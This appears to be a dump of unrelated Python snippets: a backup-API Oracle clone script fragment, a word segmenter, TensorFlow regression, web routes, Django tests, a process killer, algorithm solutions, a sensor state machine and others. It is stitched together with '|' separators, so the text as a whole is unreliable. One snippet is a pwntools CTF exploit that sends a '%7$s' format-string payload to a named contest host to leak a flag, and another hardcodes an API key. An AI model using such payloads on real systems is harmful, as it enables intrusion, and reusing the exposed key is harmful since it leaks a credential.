    "restoreAppParams": {
        "type": 19,
        "ownerRestoreInfo": {
            "ownerObject": {
                "jobUid": latestdb['vmDocument']['objectId']['jobUid'],
                "jobId": latestdb['vmDocument']['objectId']['jobId'],
                "jobInstanceId": version['instanceId']['jobInstanceId'],
                "startTimeUsecs": version['instanceId']['jobStartTimeUsecs'],
                "entity": {
                    "id": latestdb['vmDocument']['objectId']['entity']['parentId'],
                }
            },
            "ownerRestoreParams": {
                "action": "kCloneVMs",
                "powerStateConfig": {}
            },
            "performRestore": False
        },
        "restoreAppObjectVec": [
            {
                "appEntity": latestdb['vmDocument']['objectId']['entity'],
                "restoreParams": {
                    "oracleRestoreParams": {
                        "alternateLocationParams": {
                            "newDatabaseName": targetdb,
                            "homeDir": oraclehome,
                            "baseDir": oraclebase
                        },
                        "captureTailLogs": False,
                        "secondaryDataFileDestinationVec": [
                            {}
                        ]
                    },
                    "targetHost": targetEntity['appEntity']['entity'],
                    "targetHostParentSource": {
                        "id": targetEntity['appEntity']['entity']['id']
                    }
                }
            }
        ]
    }
}
# apply log replay time
if validLogTime is True:
    cloneParams['restoreAppParams']['restoreAppObjectVec'][0]['restoreParams']['oracleRestoreParams']['restoreTimeSecs'] = int(logusecs / 1000000)
else:
    if logtime is not None:
        print('LogTime of %s is out of range' % logtime)
        print('Available range is %s to %s' % (usecsToDate(logStart), usecsToDate(logEnd)))
        exit(1)
### execute the clone task
response = api('post', '/cloneApplication', cloneParams)
if 'errorCode' in response:
    exit(1)
print("Cloning DB %s as %s..." % (sourcedb, targetdb))
taskId = response['restoreTask']['performRestoreTaskState']['base']['taskId']
status = api('get', '/restoretasks/%s' % taskId)
# optionally poll once per second until the task reaches a terminal state
if wait is True:
    finishedStates = ['kCanceled', 'kSuccess', 'kFailure']
    while(status[0]['restoreTask']['performRestoreTaskState']['base']['publicStatus'] not in finishedStates):
        sleep(1)
        status = api('get', '/restoretasks/%s' % taskId)
    if(status[0]['restoreTask']['performRestoreTaskState']['base']['publicStatus'] == 'kSuccess'):
        print('Clone Completed Successfully')
        exit(0)
    else:
        print('Clone ended with state: %s' % status[0]['restoreTask']['performRestoreTaskState']['base']['publicStatus'])
        exit(1)
|
from 规则分词.mmcut import DicHelper
class RMMCut():
    """Reverse maximum matching (RMM) word segmentation.

    Scans the text from right to left, greedily matching the longest
    dictionary word that ends at the current position.
    """
    def __init__(self, window_size=1):
        # Maximum match length, i.e. the longest dictionary entry.
        self.window_size = window_size

    def cut(self, text, dic):
        """Segment *text* against *dic*; each token is suffixed with '--'."""
        tokens = []
        delimiter = '--'
        index = len(text)
        while index > 0:
            # Candidate slices end at `index`; starts run upward, so the
            # longest candidate (window_size chars) is tried first and the
            # fallback is the single trailing character.
            for start in range(index - self.window_size, index):
                piece = text[start:index]
                if piece in dic:
                    # Match found: jump to its start (the +1 here is
                    # cancelled by the shared index -= 1 below).
                    index = start + 1
                    break
            # No match: `piece` is the last single character tried, which is
            # cut off on its own.
            index -= 1
            tokens.append(piece + delimiter)
        tokens.reverse()
        return tokens
if __name__=='__main__':
    # Demo: segment a classic ambiguous phrase ("research the origin of life").
    text = '研究生命的起源'
    dic = ['研究', '研究生', '生命', '的', '起源']
    helper = DicHelper(dic)
    # Window size = length of the longest dictionary entry, per the helper.
    cutter=RMMCut(helper.longestInDic())
    print(cutter.cut(text,dic))
from pwn import *
import sys
#import kmpwn
sys.path.append('/home/vagrant/kmpwn')
from kmpwn import *
#fsb(width, offset, data, padding, roop)
#config
context(os='linux', arch='i386')
context.log_level = 'debug'
FILE_NAME = "./secret-flag"
HOST = "2020.redpwnc.tf"
PORT = 31826
# Passing 'r' on the command line targets the remote CTF service;
# the default is a local process of the challenge binary.
if len(sys.argv) > 1 and sys.argv[1] == 'r':
    conn = remote(HOST, PORT)
else:
    conn = process(FILE_NAME)
elf = ELF(FILE_NAME)
def exploit():
    # Format-string bug: "%7$s" dereferences the 7th positional argument on
    # the stack and prints the string it points to -- presumably the flag,
    # given the binary name.
    payload = "%7$s"
    conn.sendlineafter("?\n", payload)
    conn.interactive()
if __name__ == "__main__":
    exploit()
|
import tensorflow as tf
import numpy as np
# Ground-truth linear model: y = 3 + 10*x plus gaussian noise.
true_parameter = np.array([3, 10]).reshape(2, 1)
train_x = np.hstack((np.ones([100, 1]), np.random.rand(100, 1)))  # bias column + one random feature
train_y = np.dot(train_x, true_parameter) + np.random.randn(100, 1)
# NOTE(review): TF1 graph API (placeholder/Session, *_summary, xrange) --
# this script requires tensorflow<1.0-era APIs under Python 2.
x = tf.placeholder(tf.float32, [100, 2])
theta = tf.Variable(tf.zeros([2, 1]))
hypothesis = tf.matmul(x, theta)
cost = tf.reduce_mean(tf.square(hypothesis - train_y))
train = tf.train.GradientDescentOptimizer(0.05).minimize(cost)
tf.scalar_summary('cost', cost)
tf.histogram_summary('theta', theta)
init_op = tf.initialize_all_variables()
summary = tf.merge_all_summaries()
with tf.Session() as sess:
    writer = tf.train.SummaryWriter("./rg_logs", sess.graph_def)
    sess.run(init_op)
    # 1000 gradient-descent steps; log theta and summaries every 100 steps.
    for i in xrange(1000):
        sess.run(train, feed_dict = { x: train_x })
        if i % 100 == 0:
            print(sess.run(theta).reshape(1, 2))
            summary_result = sess.run(summary, feed_dict = { x: train_x })
            writer.add_summary(summary_result, i)
|
from uuid import UUID
from onegov.fsi import FsiApp
from onegov.fsi.collections.attendee import CourseAttendeeCollection
from onegov.fsi.collections.audit import AuditCollection
from onegov.fsi.collections.course import CourseCollection
from onegov.fsi.collections.course_event import CourseEventCollection, \
PastCourseEventCollection
from onegov.fsi.collections.notification_template import \
CourseNotificationTemplateCollection
from onegov.fsi.collections.subscription import SubscriptionsCollection
from onegov.fsi.models.course import Course
from onegov.fsi.models.course_attendee import CourseAttendee
from onegov.fsi.models.course_event import CourseEvent
from onegov.fsi.models.course_notification_template import \
CourseNotificationTemplate
from onegov.fsi.models.course_subscription import CourseSubscription
@FsiApp.path(model=Course, path='/fsi/course/{id}')
def get_course_details(request, id):
    """Resolve /fsi/course/{id} to a Course via the collection."""
    return CourseCollection(request.session).by_id(id)
@FsiApp.path(model=CourseEvent, path='/fsi/event/{id}')
def get_course_event_details(request, id):
    """Resolve /fsi/event/{id}; hidden events are visible to managers only."""
    return CourseEventCollection(
        request.session,
        show_hidden=request.is_manager,
        show_locked=True
    ).by_id(id)
@FsiApp.path(
    model=PastCourseEventCollection,
    path='/fsi/past-events',
    converters=dict(course_id=UUID, show_hidden=bool, sort_desc=bool)
)
def get_past_events_view(
    request,
    page=0,
    show_hidden=False,
    course_id=None,
):
    """Paginated collection of past course events."""
    # Only managers may request hidden events.
    if not request.is_manager and show_hidden:
        show_hidden = False
    return PastCourseEventCollection(
        request.session,
        page=page,
        show_hidden=show_hidden,
        course_id=course_id,
        show_locked=True
    )
@FsiApp.path(
    model=CourseEventCollection,
    path='/fsi/events',
    converters=dict(
        upcoming_only=bool, past_only=bool, course_id=UUID, limit=int,
        show_hidden=bool, sort_desc=bool
    )
)
def get_events_view(
    request,
    page=0,
    from_date=None,
    upcoming_only=False,
    past_only=False,
    limit=None,
    show_hidden=True,
    course_id=None,
    sort_desc=False
):
    """Paginated, filterable collection of course events."""
    # Only managers may see hidden events (note: default is show_hidden=True,
    # so it is force-disabled here for everyone else).
    if not request.is_manager and show_hidden:
        show_hidden = False
    return CourseEventCollection(
        request.session,
        page=page,
        from_date=from_date,
        upcoming_only=upcoming_only,
        past_only=past_only,
        limit=limit,
        show_hidden=show_hidden,
        course_id=course_id,
        sort_desc=sort_desc,
        show_locked=True
    )
@FsiApp.path(model=CourseCollection, path='/fsi/courses',
             converters=dict(show_hidden_from_public=bool))
def get_courses(request, show_hidden_from_public):
    """Course catalogue; only admins may include publicly-hidden courses."""
    if not request.is_admin:
        show_hidden_from_public = False
    return CourseCollection(
        request.session,
        auth_attendee=request.attendee,
        show_hidden_from_public=show_hidden_from_public
    )
@FsiApp.path(model=CourseAttendeeCollection, path='/fsi/attendees',
             converters=dict(
                 exclude_external=bool,
                 external_only=bool,
                 editors_only=bool,
                 admins_only=bool,
             ))
def get_attendees(
        request, page=0, exclude_external=False, external_only=False,
        editors_only=False, admins_only=False):
    """This collection has permission private, so no members can see it"""
    # Fixed converter key: it was misspelled 'admins_ony', so the bool
    # converter was never applied to the actual 'admins_only' parameter.
    return CourseAttendeeCollection(
        request.session, page,
        exclude_external=exclude_external,
        external_only=external_only,
        auth_attendee=request.attendee,
        editors_only=editors_only,
        admins_only=admins_only
    )
@FsiApp.path(model=CourseAttendee, path='/fsi/attendee/{id}')
def get_attendee_details(request, id):
    """Resolve /fsi/attendee/{id} to a CourseAttendee."""
    return CourseAttendeeCollection(request.session).by_id(id)
@FsiApp.path(model=CourseNotificationTemplateCollection, path='/fsi/templates',
             converters=dict(course_event_id=UUID))
def get_notification_templates(request, course_event_id=None):
    """Notification templates, optionally scoped to one course event."""
    return CourseNotificationTemplateCollection(
        request.session, course_event_id=course_event_id)
@FsiApp.path(model=CourseNotificationTemplate, path='/fsi/template/{id}')
def get_template_details(request, id):
    """Resolve /fsi/template/{id} to a CourseNotificationTemplate."""
    return CourseNotificationTemplateCollection(request.session).by_id(id)
@FsiApp.path(model=SubscriptionsCollection, path='/fsi/reservations',
             converters=dict(
                 attendee_id=UUID, course_event_id=UUID, external_only=bool)
             )
def get_reservations(
        app, request,
        course_event_id=None, attendee_id=None, external_only=False, page=0):
    """Subscriptions ("reservations") collection.

    Non-managers are always pinned to their own attendee_id, whether they
    omitted it or requested somebody else's.
    """
    if not attendee_id:
        if not request.is_manager:
            # check if someone has permission to see all subscriptions
            attendee_id = request.attendee_id
        # can be none....still, so not protected, use permissions
    elif attendee_id != request.attendee_id and not request.is_manager:
        attendee_id = request.attendee_id
    return SubscriptionsCollection(
        request.session,
        attendee_id=attendee_id,
        course_event_id=course_event_id,
        external_only=external_only,
        auth_attendee=request.attendee,
        page=page
    )
@FsiApp.path(model=CourseSubscription, path='/fsi/reservation/{id}')
def get_reservation_details(request, id):
    """Resolve /fsi/reservation/{id} to a CourseSubscription."""
    return SubscriptionsCollection(request.session).by_id(id)
@FsiApp.path(model=AuditCollection, path='/fsi/audit',
             converters=dict(
                 course_id=UUID, organisations=[str], page=int))
def get_audit(request, course_id, organisations, page=0, letter=None):
    """Audit view for one course, filterable by organisations and a name letter."""
    return AuditCollection(
        request.session,
        course_id,
        auth_attendee=request.attendee,
        organisations=organisations,
        page=page,
        letter=letter
    )
|
import json
import unittest
from unittest import mock
from django.test import RequestFactory
from django.conf import settings
from api import views, middleware
settings.configure()
class TestStringMethods(unittest.TestCase):
    """Tests for the /avtale view, routing raised exceptions through the
    project's ViewExceptionMiddleware just like the real request cycle.

    Fixes: the deprecated assertEquals/assertAlmostEquals aliases were
    replaced with assertEqual (the aliases are removed in Python 3.12, and
    assertAlmostEqual's third positional argument is `places`, not `msg`,
    so the old calls would TypeError on any mismatch of string values).
    """

    def setUp(self):
        self.factory = RequestFactory()
        self.middleware = middleware.ViewExceptionMiddleware()

    def process_request(self, request):
        """
        helper method for making POST request to /avtale
        as well as running exceptions through middleware
        """
        try:
            response = views.avtale(request)
            response_json = json.loads(response.content.decode())
            return response, response_json
        except Exception as e:
            response = self.middleware.process_exception(e)
            try:
                response_json = json.loads(response.content.decode())
                return response, response_json
            except (ValueError, AttributeError):
                # Middleware response has no (JSON) body -- return it raw.
                return response, None

    @mock.patch('api.services.fagsystem.opprett_kunde')
    @mock.patch('api.services.fagsystem.opprett_avtale')
    @mock.patch('api.services.fagsystem.oppdater_avtale')
    @mock.patch('api.services.send_email')
    def test_ok_response(self, send_email, oppdater_avtale, opprett_avtale, opprett_kunde):
        # mock
        request = self.factory.post(path='/avtale')
        opprett_kunde.return_value = ('2222', 'mail@mail.com')
        opprett_avtale.return_value = '3333'
        oppdater_avtale.return_value = True
        send_email.return_value = 'avtale sendt'
        # make request
        response, response_json = self.process_request(request)
        # assert 200 OK
        self.assertEqual(response.status_code, 200, 'OK')
        # assert json body
        self.assertEqual(response_json.get('avtalenummer'), '3333', 'avtale nummer er riktig')
        self.assertEqual(response_json.get('status'), 'avtale sendt', 'status er riktig')
        # assert mail was sendt
        send_email.assert_called_with('mail@mail.com', '3333')

    def test_503_if_service_unavailable(self):
        # mock, but let fagsystem attempt request to nowhere
        request = self.factory.post(path='/avtale')
        # make request
        response, response_json = self.process_request(request)
        self.assertEqual(response.status_code, 503)

    @mock.patch('api.services.fagsystem.opprett_kunde')
    @mock.patch('api.services.fagsystem.opprett_avtale')
    @mock.patch('api.services.fagsystem.put')
    @mock.patch('api.services.send_email')
    def test_could_not_update_avtale(self, send_email, http_put, opprett_avtale, opprett_kunde):
        request = self.factory.post(path='/avtale')
        opprett_kunde.return_value = ('2222', 'mail@mail.com')
        opprett_avtale.return_value = '3333'
        send_email.return_value = 'avtale sendt'
        # Mock http PUT to return with HTTP STATUS 400, thereby failing
        http_put.return_value = (True, 400)
        # make request
        response, response_json = self.process_request(request)
        self.assertEqual(response_json.get('status'), 'Avtale sendt, men vi klarte ikke oppdatere databasen vår. Kontakt support')
# Run the suite only when executed directly (not when imported).
if __name__ == '__main__':
    unittest.main()
|
# -*- coding: UTF-8 -*-
# Date : 2020/2/17 15:53
# Editor : gmj
# Desc :
#
# import os
# import time
# ret = os.system('tasklist | find "QQ.exe"')
#
# print(ret)
import psutil
def get_count_of_nodejs():
    """Return how many running processes are named exactly 'node.exe'."""
    return sum(1 for proc in psutil.process_iter() if proc.name() == 'node.exe')
def kill_process_with_name(process_name, num):
    """
    Kill up to *num* processes whose name contains *process_name*
    (case-insensitive substring match; docstring translated from Chinese:
    "kill processes by process name").

    Each match is terminated and then waited on (3 s timeout) so it is
    reaped before continuing. Processes that vanish mid-scan are ignored.

    Bug fix: the old guard was ``num < 0``, so ``num == 0`` still
    terminated one process before the ``i >= num`` check broke the loop.
    """
    if num <= 0:
        return
    killed = 0
    for pid in psutil.pids():
        try:
            proc = psutil.Process(pid)
            if process_name.lower() in proc.name().lower():
                proc.terminate()
                killed += 1
                proc.wait(timeout=3)
                if killed >= num:
                    break
        except psutil.NoSuchProcess:
            # Process exited on its own between pids() and here.
            pass
def kill_nodejs():
    """Terminate surplus node.exe processes, keeping at most five alive."""
    surplus = get_count_of_nodejs() - 5
    kill_process_with_name('node.exe', surplus)
# Script entry point: prune surplus node.exe processes.
if __name__ == '__main__':
    kill_nodejs()
|
# Tab length compensation a negative number will increase the gap between the tabs
# a fudge factor that increases the gap along the finger joint when negative - it should be 1/4 of the gap you want
fudge=0.1
thickness=3
#
# Box dimensions in drawing units (presumably millimetres -- TODO confirm).
box_width=60
box_height=15
box_depth = 25
cutter='laser'
tab_length=5
# Common origin for every side; V appears to be camcam's 2D vector type.
centre = V(0,0)
module = camcam.add_plane(Plane('plane',cutter=cutter))
# NOTE(review): all four add_layer results are bound to the same name
# 'Lbottom' -- only the last binding survives, although the layers
# themselves are still registered on the module. Confirm the variable is
# intentionally unused.
Lbottom=module.add_layer('bottom', material='perspex', thickness=thickness, z0=0, zoffset=-thickness-box_depth)
Lbottom=module.add_layer('top', material='perspex', thickness=thickness, z0=0, zoffset=-thickness-box_depth)
Lbottom=module.add_layer('back', material='perspex', thickness=thickness, z0=0, zoffset=-thickness-box_depth)
Lbottom=module.add_layer('side', material='perspex', thickness=thickness, z0=0, zoffset=-thickness-box_depth)
# Back/front panel: width x height with finger joints, corners 'off'.
back_border=FingerJointBoxSide(
    centre,
    box_width,
    box_height,
    'in',
    corners={'left':'off',
             'top':'off',
             'right':'off',
             'bottom':'off'},
    sidemodes={},
    tab_length=tab_length,
    thickness=thickness,
    cutterrad=0,
    cutter=cutter,
    centred=True,
    fudge=fudge,
    auto=True
)
back=module.add_path(Part(name='back', border=back_border, layer='back'))
# Two copies: the box needs both a back and a front.
back.number=2
# Bottom/top panel: width x depth; joints enabled on top and bottom edges.
bottom_border = FingerJointBoxSide( centre,
    box_width,
    box_depth,
    'in',
    corners={ 'left':'off',
              'top':'on',
              'right':'off',
              'bottom':'on'},
    sidemodes={},
    tab_length=tab_length,
    thickness={ 'left':thickness,
                'right':thickness,
                'bottom':thickness,
                'top':thickness},
    cutterrad=0,
    cutter=cutter,
    centred=True,
    fudge=fudge,
    auto=True
)
# The same border outline is reused for both the top and the bottom panel.
top=module.add_path(Part(name='top', border=bottom_border, layer='top'))
bottom=module.add_path(
    Part(name='bottom',
         border=bottom_border,
         layer='bottom'
    )
)
# Side panel: depth x height with finger joints on all four edges; cut twice.
side = module.add_path(
    Part(name='side',
         border = FingerJointBoxSide(
             centre,
             box_depth,
             box_height,
             'in',
             corners={'left':'on',
                      'top':'on',
                      'right':'on',
                      'bottom':'on'},
             sidemodes={},
             tab_length=tab_length,
             thickness ={'left':thickness,
                         'right':thickness,
                         'bottom':thickness,
                         'top':thickness},
             cutterrad=0,
             cutter=cutter,
             centred=True,
             fudge=fudge,
             auto=True
         ),
         layer='side'
    ),
    # NOTE(review): both layer='side' (on Part) and layers='side' (on
    # add_path) are passed -- confirm add_path accepts a 'layers' kwarg.
    layers='side'
)
side.number=2
|
def twoSum(self, nums: List[int], target: int) -> List[int]:
    """
    Return indices [i, j] of two distinct entries of *nums* that sum to
    *target*, or [] when no such pair exists.

    Two-pass hash map: first record every value's (last) index, then scan
    for a complement at a different index. O(n) time, O(n) space.
    """
    index_of = {}
    for idx, value in enumerate(nums):
        index_of[value] = idx
    for idx, value in enumerate(nums):
        partner = index_of.get(target - value)
        if partner is not None and partner != idx:
            return [idx, partner]
    return []
# return [] |
# -*- coding: utf-8 -*-
from time import time
import button
import thingSpeakService
import buzzer
import servo
import rotation
import led
from grove import grove_4_digit_display
THING_SPEAK_CHANNEL = 935198
THING_SPEAK_API_KEY = '81SYGRV7PHQU25C8'
class StateMachine():
    """
    Finite-state controller for a CO2 monitor. The current state is a bound
    method (co2 / temp / hum / set_co2_threshold / alarm) that run() invokes
    once per cycle.

    NOTE(review): indentation was reconstructed from a whitespace-mangled
    source -- confirm branch nesting (esp. set_co2_threshold and
    cycle_display) against the original file.
    """
    def __init__(self, button, display, sensor_service, buzzer, rotation_sensor, servo, led):
        self.button = button
        self.display = display
        self.sensor_service = sensor_service
        self.buzzer = buzzer
        self.rotation_sensor = rotation_sensor
        self.servo = servo
        self.led = led
        # State is a bound method; start by showing the CO2 reading.
        self.state = self.co2
        self.old_state = self.state
        self.state_change_time = 0
        self.cycle_display_delay = 5  # seconds each display page is shown
        self.co2_threshold = 2000     # alarm threshold (ppm, presumably -- TODO confirm)
        self.alarm_muted = False
        self.i = 0                    # scroll offset used by show_text
        self.last_rotation = 0
        self.last_rotation_time = 0
        self.rotation_delay = 5       # idle seconds before leaving threshold setup
    def run(self):
        # Record when the state last changed (drives display cycling).
        if self.state != self.old_state:
            self.old_state = self.state
            self.state_change_time = time()
        # display co2 measurement with servo
        co2 = self.sensor_service.get_co2()
        self.servo.set_pulsewidth(co2)
        # show with led if over threshold
        if co2 > self.co2_threshold:
            self.led.turn_on()
        else:
            self.led.turn_off()
        # run state
        self.state()
    def test_for_alarm(self):
        # Trip the alarm once per threshold crossing; re-arm when the
        # reading drops back below the threshold.
        if self.sensor_service.get_co2() > self.co2_threshold:
            if not self.alarm_muted:
                self.alarm_muted = True
                self.state = self.alarm
        else:
            self.alarm_muted = False
    def cycle_display(self):
        states = [self.temp, self.hum, self.co2]
        if self.button.was_double_pressed():
            self.state = self.set_co2_threshold
        elif self.button.was_pressed() or time() - self.state_change_time > self.cycle_display_delay:
            # Advance to the next display page (wraps around).
            self.state = states[(states.index(self.state) + 1) % len(states)]
            self.button.reset()
    def show_text(self, text):
        # Scroll *text* across the 4-digit display, one step per call.
        self.i = (self.i + 1) % (len(text) + 4)
        self.display.show(f" {text} "[self.i:self.i+4])
    def show_co2(self, co2=None):
        # Show a CO2 value (current reading when none is given),
        # right-aligned on the 4-digit display.
        if co2 is None:
            co2 = self.sensor_service.get_co2()
        # print(f"co2: {co2}")
        co2str = f"{co2:4}"
        self.display.show(co2str[-4:])
    def temp(self):
        t = self.sensor_service.get_temp()
        # print(f"temp: {t}")
        self.display.show(f"{str(round(t))[-2:]:2}*C")
        # next state
        self.cycle_display()
        self.test_for_alarm()
    def hum(self):
        h = self.sensor_service.get_hum()
        # print(f"hum: {h}")
        self.display.show(f"h {str(round(h))[-2:]:2}")
        # next state
        self.cycle_display()
        self.test_for_alarm()
    def co2(self):
        self.show_co2()
        # next state
        self.cycle_display()
        self.test_for_alarm()
    def set_co2_threshold(self):
        # Round the rotation-sensor reading to the nearest 50 step.
        rotation_co2 = round(self.rotation_sensor.get_translated_value() / 50) * 50
        current_time = time()
        if rotation_co2 != self.last_rotation:
            self.last_rotation = rotation_co2
            self.last_rotation_time = current_time
            self.show_co2(rotation_co2)
            self.co2_threshold = rotation_co2
        # next state
        if current_time - self.last_rotation_time > self.rotation_delay or self.button.was_pressed():
            self.state = self.co2
            self.last_rotation = -1
    def alarm(self):
        self.show_co2()
        self.buzzer.turn_on()
        # next state
        if self.button.was_pressed():
            self.state = self.co2
            self.buzzer.turn_off()
        if self.sensor_service.get_co2() < self.co2_threshold:
            self.alarm_muted = True
            self.state = self.co2
            self.buzzer.turn_off()
# --- Wiring / hardware setup (runs at import time) ---
disp = grove_4_digit_display.Grove(16, 17, brightness=grove_4_digit_display.BRIGHT_HIGHEST)
button = button.Button(pin=5, double_press_threshold=0.4)  # NOTE: shadows the 'button' module
service = thingSpeakService.ThingSpeakService(channel=THING_SPEAK_CHANNEL, api_key=THING_SPEAK_API_KEY)
buzzer = buzzer.Buzzer(12)  # NOTE: shadows the 'buzzer' module
servo = servo.Servo(pin=18, min=0, max=5000)  # NOTE: shadows the 'servo' module
rot_sensor = rotation.RotationSensor(pin=4, min=0, max=5000)
led_actuator = led.Led(6)
SM = StateMachine(button=button, display=disp, sensor_service=service, buzzer=buzzer, rotation_sensor=rot_sensor, servo=servo, led=led_actuator)
# Main loop: run the state machine until Ctrl-C, then blank the display.
try:
    while True:
        SM.run()
except KeyboardInterrupt:
    disp.show(" ")
|
class Solution(object):
    """Wildcard pattern matching: '?' matches any one character and '*'
    matches any (possibly empty) sequence of characters."""

    def isMatch(self, s, p):
        """Return True when pattern *p* matches the entire string *s*.

        Greedy two-pointer scan: remember the most recent '*' and, on a
        mismatch, backtrack to it while letting it absorb one more
        character. Earlier '*' anchors can be discarded safely: once a
        later '*' is reached, every continuation of the earlier one is
        subsumed. O(len(s) * len(p)) worst case, O(1) extra space.
        """
        si = pi = 0
        star_pi = -1   # pattern index of the last '*' seen (-1: none yet)
        star_si = 0    # position in s where that '*' started matching
        while si < len(s):
            pattern_left = pi < len(p)
            if pattern_left and (p[pi] == s[si] or p[pi] == '?'):
                si += 1
                pi += 1
            elif pattern_left and p[pi] == '*':
                # Anchor for later backtracking; '*' initially matches "".
                star_si, star_pi = si, pi
                pi += 1
            elif star_pi != -1:
                # Backtrack: the anchored '*' swallows one more character.
                star_si += 1
                si = star_si
                pi = star_pi + 1
            else:
                # No anchor to fall back to -- definite mismatch.
                return False
        # s is consumed; the remainder of p must be all '*'.
        while pi < len(p) and p[pi] == '*':
            pi += 1
        return pi == len(p)
|
# Generated by Django 2.2.13 on 2020-12-16 19:33
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the UploadedFiles table tracking files uploaded per question."""

    dependencies = [
        ('carts_api', '0018_auto_20201123_1702'),
    ]

    operations = [
        migrations.CreateModel(
            name='UploadedFiles',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('filename', models.CharField(default='', max_length=256)),
                # Name under which the file is stored on AWS (S3, presumably -- TODO confirm).
                ('aws_filename', models.CharField(default='', max_length=256)),
                ('question_id', models.CharField(max_length=16)),
                ('uploaded_date', models.DateTimeField(auto_now_add=True)),
                ('uploaded_username', models.CharField(default='', max_length=16)),
                ('uploaded_state', models.CharField(default='', max_length=16)),
            ],
        ),
    ]
|
import base64
import os
def generate_token() -> str:
    """Return 32 cryptographically random bytes as standard Base64 text."""
    raw = os.urandom(32)
    return base64.b64encode(raw).decode()
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
from ava.task import action
from bs4 import BeautifulSoup
@action
def parse(html_text, parser='html.parser'):
    """ Use BeautifulSoup4 to parse HTML document.

    :param html_text: the HTML data (string or bytes)
    :param parser: the type of parser to use (e.g. 'html.parser', 'lxml')
    :return: a BS4 parser (BeautifulSoup object)
    """
    return BeautifulSoup(html_text, parser)
|
# Demonstration of Python set basics: creation, add, copy, difference.
setnumber = {10, 5, 65, 'saquib', 'python', 'flask', 10, 'value'}
set2 = {'python', 'flask', 10}
print(set2)
print(setnumber)
# denoted by {} does not show the duplicate value
# can store string and integer values
setnumber.add(2.6)
print(setnumber)
# NOTE(review): copy() returns a new set; this bare call discards it.
setnumber.copy()
print(setnumber)
set2 = setnumber.copy()
print(set2)
# copy makes the shallow copy of setnumber to set2
# NOTE(review): difference() with no args also returns a (discarded) copy.
set2.difference()
print(setnumber.difference(set2))
A = {10, 20, 30, 40, 80}
B = {100, 30, 80, 40, 60, 80}
print (A.difference(B))
print (B.difference(A))
setnumber.difference_update()
|
#scattegories ?
#provides basic framework for playing
#still need pencils and other players
#TODO: fully automate + AI ?
import random, time
numPlayers = 0
timer = 180 #seconds
numCategories = 12
categoryList = []
letter = ""
def getNum():
    """Prompt repeatedly until the user types an integer; return it.

    Fix: the old bare ``except`` also swallowed KeyboardInterrupt and
    EOFError; only ValueError (bad int) is retried now.
    """
    while True:
        try:
            return int(input(''))
        except ValueError:
            print("Sorry, that's not a number. Please enter the numerical digit.")
def getCategories(num):
    """Return *num* categories drawn (with replacement) from categories.txt.

    One category per line; duplicates are possible because each pick is an
    independent random draw.

    Fix: the file is now closed via a context manager even if the read
    raises (the old open/read/close leaked the handle on error).
    """
    with open("categories.txt", "r") as f:
        allCats = f.read().split("\n")
    # Note: a trailing newline in the file yields an '' category entry,
    # matching the original split() behaviour.
    return [allCats[random.randrange(len(allCats))] for _ in range(num)]
def getLetter():
    """Return one uppercase ASCII letter chosen uniformly at random."""
    return "ABCDEFGHIJKLMNOPQRSTUVWXYZ"[random.randrange(26)]
#game starts here
print("Welcome to Scattegories!")
print("Please enter the number of players")
numPlayers = getNum()
print("Please enter the number of categories to play. The default is 12.")
numCategories = getNum()
print("Please enter the number of seconds for the timer. The default is 180")
timer = getNum()
# NOTE(review): missing space before "random" in the output string below.
print("Generating " + str(numCategories) + "random categories and a random letter.")
categoryList = getCategories(numCategories)
letter = getLetter()
answers = []
print("All players ready their pencils and paper.")
# NOTE(review): missing space before "seconds" in the output string below.
print("The categories will be displayed, and you will each have " + str(timer) + "seconds to write a word beginning with the letter and matching the category.")
print("Are you ready?")
time.sleep(5)
print("Begin!")
print("The letter is " + letter)
print("And the categories are : ")
for i in range(len(categoryList)):
    print (str(i + 1) + ". " + categoryList[i] )
time.sleep(timer)
print ("\n" * 100) #clear the screen effectively
print("Times up! Now discuss your answers and award points.")
|
#!/usr/bin/python
#\file simple_read.py
#\brief Simply read from serial port.
#\author Akihiko Yamaguchi, info@akihikoy.net
#\version 0.1
#\date Jul.01, 2021
import sys
import serial
# Python 2 script (note the print statement): dump lines from a serial port.
if __name__=='__main__':
    # Device and baud rate from argv, with sensible defaults.
    dev= sys.argv[1] if len(sys.argv)>1 else '/dev/ttyACM0'
    baudrate= int(sys.argv[2]) if len(sys.argv)>2 else 19200
    #serial.SEVENBITS
    # 8 data bits, no parity.
    ser= serial.Serial(dev,baudrate,serial.EIGHTBITS,serial.PARITY_NONE)
    try:
        while True:
            raw= ser.readline()
            print 'Received: {raw} ({l})'.format(raw=repr(raw), l=len(raw))
    finally:
        # Always release the port, even on Ctrl-C.
        ser.close()
|
# python 2.7.3
import sys
import math
# Python 2 script: read n words and report every q such that the words can
# be split into q contiguous equal-sized groups, each naming one distinct
# language ('unknown' entries act as wildcards).
n = input()
words = [None for i in range(n)]
for i in range(n):
    words[i] = raw_input()
ans = []
for i in range(1, n + 1):
    # i is the group size; it must divide n exactly.
    if n % i != 0:
        continue
    q = n / i
    lan = set()  # languages already claimed by earlier groups
    valid = True
    for j in range(q):
        temp = set(words[j * i:(j + 1) * i])
        if 'unknown' in temp:
            temp.remove('unknown')
        if len(temp) > 1:
            # A group mixes two known languages -> this split is impossible.
            valid = False
            break
        if len(temp) == 1:
            if list(temp)[0] in lan:
                # Same language appears in two different groups -> invalid.
                valid = False
                break
            else:
                lan.add(list(temp)[0])
        else:
            # Group is all 'unknown' -- any unused language fits.
            continue
    if valid:
        ans.append(q)
if not ans:
    print 'Igor is wrong.'
else:
    print ' '.join(map(str, ans[::-1]))
|
from .base import BaseModel
class FooterModel(BaseModel):
    """Model for the page footer; exposes a single 'copyright' property."""
    def init(self):
        # Register the footer's only property on the base model.
        self.add_property('copyright')
|
from fractions import gcd
def simplify_fraction(fraction):
    """Reduce a (numerator, denominator) tuple to lowest terms.

    :param fraction: 2-tuple of ints (numerator, denominator)
    :return: new 2-tuple with both parts divided by their GCD
    """
    # fractions.gcd was deprecated in Python 3.5 and removed in 3.9;
    # math.gcd is the supported replacement. Also compute the GCD once
    # instead of twice.
    from math import gcd as _gcd
    divisor = _gcd(fraction[0], fraction[1])
    return (fraction[0] // divisor, fraction[1] // divisor)
|
import sys
import re
from pprint import pprint, pformat
from datetime import datetime, timedelta
import pytz
import logging
from collections import namedtuple
from netCDF4 import Dataset
import numpy as np
# Logging: timestamped messages to stderr at INFO level.
FORMAT = '%(asctime)s %(message)s'
logger = logging.getLogger()
handler = logging.StreamHandler()
formatter = logging.Formatter(FORMAT)
handler.setFormatter(formatter)
